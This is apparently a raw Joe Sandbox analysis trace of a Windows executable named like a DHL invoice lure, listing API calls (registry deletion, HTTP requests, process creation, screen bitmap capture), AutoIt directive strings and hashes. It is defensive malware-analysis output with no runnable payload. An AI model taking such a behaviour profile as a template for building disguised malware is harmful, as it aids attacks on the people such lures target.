                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003C5BF2), ref: 003C844E
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003C8487
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003C84CA
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003C8501
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 003C850D
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003C851D
                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,003C5BF2), ref: 003C852C
                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003C8549
                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003C8555
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                        • API String ID: 799131459-1154884017
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                        • API String ID: 0-1645009161
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00395A2E
                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00395A40
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00395A57
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00395A6C
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00395A72
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00395A82
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00395A88
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00395AA9
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00395AC3
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00395ACC
                                                                                                                        • _wcslen.LIBCMT ref: 00395B33
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00395B6F
                                                                                                                        • GetDesktopWindow.USER32 ref: 00395B75
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00395B7C
                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00395BD3
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00395BE0
                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00395C05
                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00395C2F
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 895679908-0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[?
                                                                                                                        • API String ID: 176396367-1448639043
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 003C9147
                                                                                                                          • Part of subcall function 003C7674: ClientToScreen.USER32(?,?), ref: 003C769A
                                                                                                                          • Part of subcall function 003C7674: GetWindowRect.USER32(?,?), ref: 003C7710
                                                                                                                          • Part of subcall function 003C7674: PtInRect.USER32(?,?,003C8B89), ref: 003C7720
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003C91B0
                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003C91BB
                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003C91DE
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003C9225
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003C923E
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003C9255
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003C9277
                                                                                                                        • DragFinish.SHELL32(?), ref: 003C927E
                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003C9371
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#@$xV
                                                                                                                        • API String ID: 221274066-1020208282
                                                                                                                        APIs
                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003500C6
                                                                                                                          • Part of subcall function 003500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0040070C,00000FA0,2FC0ADF4,?,?,?,?,003723B3,000000FF), ref: 0035011C
                                                                                                                          • Part of subcall function 003500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003723B3,000000FF), ref: 00350127
                                                                                                                          • Part of subcall function 003500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003723B3,000000FF), ref: 00350138
                                                                                                                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0035014E
                                                                                                                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0035015C
                                                                                                                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0035016A
                                                                                                                          • Part of subcall function 003500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00350195
                                                                                                                          • Part of subcall function 003500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003501A0
                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 003500E7
                                                                                                                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                                                                                                                        Strings
                                                                                                                        • kernel32.dll, xrefs: 00350133
                                                                                                                        • SleepConditionVariableCS, xrefs: 00350154
                                                                                                                        • InitializeConditionVariable, xrefs: 00350148
                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00350122
                                                                                                                        • WakeAllConditionVariable, xrefs: 00350162
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                        • API String ID: 66158676-1714406822
APIs
• CharLowerBuffW.USER32(00000000,00000000,003CCC08), ref: 003A4527
• _wcslen.LIBCMT ref: 003A453B
• _wcslen.LIBCMT ref: 003A4599
• _wcslen.LIBCMT ref: 003A45F4
• _wcslen.LIBCMT ref: 003A463F
• _wcslen.LIBCMT ref: 003A46A7
  • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
• GetDriveTypeW.KERNEL32(?,003F6BF0,00000061), ref: 003A4743
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: _wcslen$BuffCharDriveLowerType
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2055661098-1000479233
APIs
• DestroyWindow.USER32(?,?), ref: 003C6DEB
  • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003C6E5F
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003C6E81
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C6E94
• DestroyWindow.USER32(?), ref: 003C6EB5
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00330000,00000000), ref: 003C6EE4
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C6EFD
• GetDesktopWindow.USER32 ref: 003C6F16
• GetWindowRect.USER32(00000000), ref: 003C6F1D
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003C6F35
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003C6F4D
  • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
Strings
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$tooltips_class32$xV
• API String ID: 2429346358-703866487
APIs
• _wcslen.LIBCMT ref: 003BB198
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BB1B0
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BB1D4
• _wcslen.LIBCMT ref: 003BB200
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BB214
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BB236
• _wcslen.LIBCMT ref: 003BB332
  • Part of subcall function 003A05A7: GetStdHandle.KERNEL32(000000F6), ref: 003A05C6
• _wcslen.LIBCMT ref: 003BB34B
• _wcslen.LIBCMT ref: 003BB366
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BB3B6
• GetLastError.KERNEL32(00000000), ref: 003BB407
• CloseHandle.KERNEL32(?), ref: 003BB439
• CloseHandle.KERNEL32(00000000), ref: 003BB44A
• CloseHandle.KERNEL32(00000000), ref: 003BB45C
• CloseHandle.KERNEL32(00000000), ref: 003BB46E
• CloseHandle.KERNEL32(?), ref: 003BB4E3
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
• String ID:
• API String ID: 2178637699-0
APIs
• GetMenuItemCount.USER32(00401990), ref: 00372F8D
• GetMenuItemCount.USER32(00401990), ref: 0037303D
• GetCursorPos.USER32(?), ref: 00373081
• SetForegroundWindow.USER32(00000000), ref: 0037308A
• TrackPopupMenuEx.USER32(00401990,00000000,?,00000000,00000000,00000000), ref: 0037309D
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003730A9
Strings
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
APIs
  • Part of subcall function 00348F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00348BE8,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348FC5
• DestroyWindow.USER32(?), ref: 00348C81
• KillTimer.USER32(00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348D1B
• DestroyAcceleratorTable.USER32(00000000), ref: 00386973
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 003869A1
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 003869B8
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000), ref: 003869D4
• DeleteObject.GDI32(00000000), ref: 003869E6
Strings
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID: xV
• API String ID: 641708696-2513823414
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003AC4B0
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003AC4C3
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003AC4D7
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003AC4F0
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003AC533
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003AC549
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003AC554
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003AC584
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003AC5DC
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003AC5F0
• InternetCloseHandle.WININET(00000000), ref: 003AC5FB
Strings
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
APIs
  • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
• GetSysColor.USER32(0000000F), ref: 00349862
Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ColorLongWindow
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 259745315-2513823414
                                                                                                                        • Opcode ID: 9320c48d443e5b82404dbade91b60119ed4079fa97096230c6f5663ba2c6469e
                                                                                                                        • Instruction ID: cea4c19b6bb1628bbceae7e752306fff377673fdf6d883762f4029431c03b37b
                                                                                                                        • Opcode Fuzzy Hash: 9320c48d443e5b82404dbade91b60119ed4079fa97096230c6f5663ba2c6469e
                                                                                                                        • Instruction Fuzzy Hash: A34185311046409FDB225F3D9C44FBA37E9AB46330F294656F9A68B1E1D731EC42DB10
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 003C8592
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85A2
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85AD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85BA
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003C85C8
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85D7
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003C85E0
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85E7
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85F8
                                                                                                                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,003CFC38,?), ref: 003C8611
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003C8621
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 003C8641
                                                                                                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 003C8671
                                                                                                                        • DeleteObject.GDI32(?), ref: 003C8699
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003C86AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3840717409-0
                                                                                                                        • Opcode ID: a6d57486e6006a32aae337b1257b8d263bc6e84a536abd7ae929fb99f500cace
                                                                                                                        • Instruction ID: 97481e60935a43c1c16f7d23834e6ab07d61d21bb08d91a0730459e76b1e04d6
                                                                                                                        • Opcode Fuzzy Hash: a6d57486e6006a32aae337b1257b8d263bc6e84a536abd7ae929fb99f500cace
                                                                                                                        • Instruction Fuzzy Hash: 7A410C75610204AFDB129FA5DC48EAABBBCFF89711F154458F909E7260DB70AE01DB60
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 003A1502
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 003A150B
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003A1517
                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003A15FB
                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 003A1657
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 003A1708
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 003A178C
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003A17D8
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003A17E7
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 003A1823
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                        • API String ID: 1234038744-3931177956
                                                                                                                        • Opcode ID: f0dfe317f5ae2735f177dfb6a3f69cc0630a56a8fb73c487277a7bf40703bbc8
                                                                                                                        • Instruction ID: ed5174aaf77762885d7e0af0d2bfa7797c1d105e32500908807435ffa9eed73a
                                                                                                                        • Opcode Fuzzy Hash: f0dfe317f5ae2735f177dfb6a3f69cc0630a56a8fb73c487277a7bf40703bbc8
                                                                                                                        • Instruction Fuzzy Hash: 26D10E32E00505EBDB02AFA5D895BB9B7B9FF47700F14805AE846AF580DB30EC41DBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BB6F4
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BB772
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 003BB80A
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003BB87E
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003BB89C
                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 003BB8F2
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003BB904
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003BB922
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003BB983
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003BB994
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 146587525-4033151799
                                                                                                                        • Opcode ID: 4b315ca804c4b4b1902c199458acc86794bafd1ee74d1eb6995fd2a60756bf34
                                                                                                                        • Instruction ID: f9f510fb033d6afbcb4213ee6e6b8c3293e8fcb49172fa0a99ab916e0d7f9c15
                                                                                                                        • Opcode Fuzzy Hash: 4b315ca804c4b4b1902c199458acc86794bafd1ee74d1eb6995fd2a60756bf34
                                                                                                                        • Instruction Fuzzy Hash: 93C19D34208201AFD712DF14C495F6AFBE5FF84318F15849CE69A8B6A2CBB1ED45CB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003C8D5A
                                                                                                                        • GetFocus.USER32 ref: 003C8D6A
                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 003C8D75
                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 003C8E1D
                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003C8ECF
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 003C8EEC
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 003C8EFC
                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003C8F2E
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003C8F70
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C8FA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                        • String ID: 0$xV
                                                                                                                        • API String ID: 1026556194-4207226023
                                                                                                                        • Opcode ID: 0adc8c1ef199f74c06fb63311ef4c7fc48a8a910c8a8f437724d0cfa6a5b6d22
                                                                                                                        • Instruction ID: 234f33bd56213dbd3803d9b6c134c70a19ae7c1999002fbcd41038655583ccca
                                                                                                                        • Opcode Fuzzy Hash: 0adc8c1ef199f74c06fb63311ef4c7fc48a8a910c8a8f437724d0cfa6a5b6d22
                                                                                                                        • Instruction Fuzzy Hash: 58817B715083019BD712CF24D884EABBBE9FB89754F15092DF989DB291DB30EE01CBA1
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003C5504
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C5515
                                                                                                                        • CharNextW.USER32(00000158), ref: 003C5544
                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003C5585
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003C559B
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C55AC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CharNext
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 1350042424-2513823414
                                                                                                                        • Opcode ID: f21112e81912598c437ed54f0767f0a3d534810b190190dca693c82580fb77c0
                                                                                                                        • Instruction ID: 626ba5d3d33078b0fa81ff6e589171cba67c51633fc7029a6b8baa7bfa8fd69c
                                                                                                                        • Opcode Fuzzy Hash: f21112e81912598c437ed54f0767f0a3d534810b190190dca693c82580fb77c0
                                                                                                                        • Instruction Fuzzy Hash: 64619C31904608ABDF129F55CC84EFE7BBDEB0A321F148149F925EA291D774AEC0DB60
APIs
• GetDC.USER32(00000000), ref: 003B25D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003B25E8
• CreateCompatibleDC.GDI32(?), ref: 003B25F4
• SelectObject.GDI32(00000000,?), ref: 003B2601
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 003B266D
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003B26AC
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003B26D0
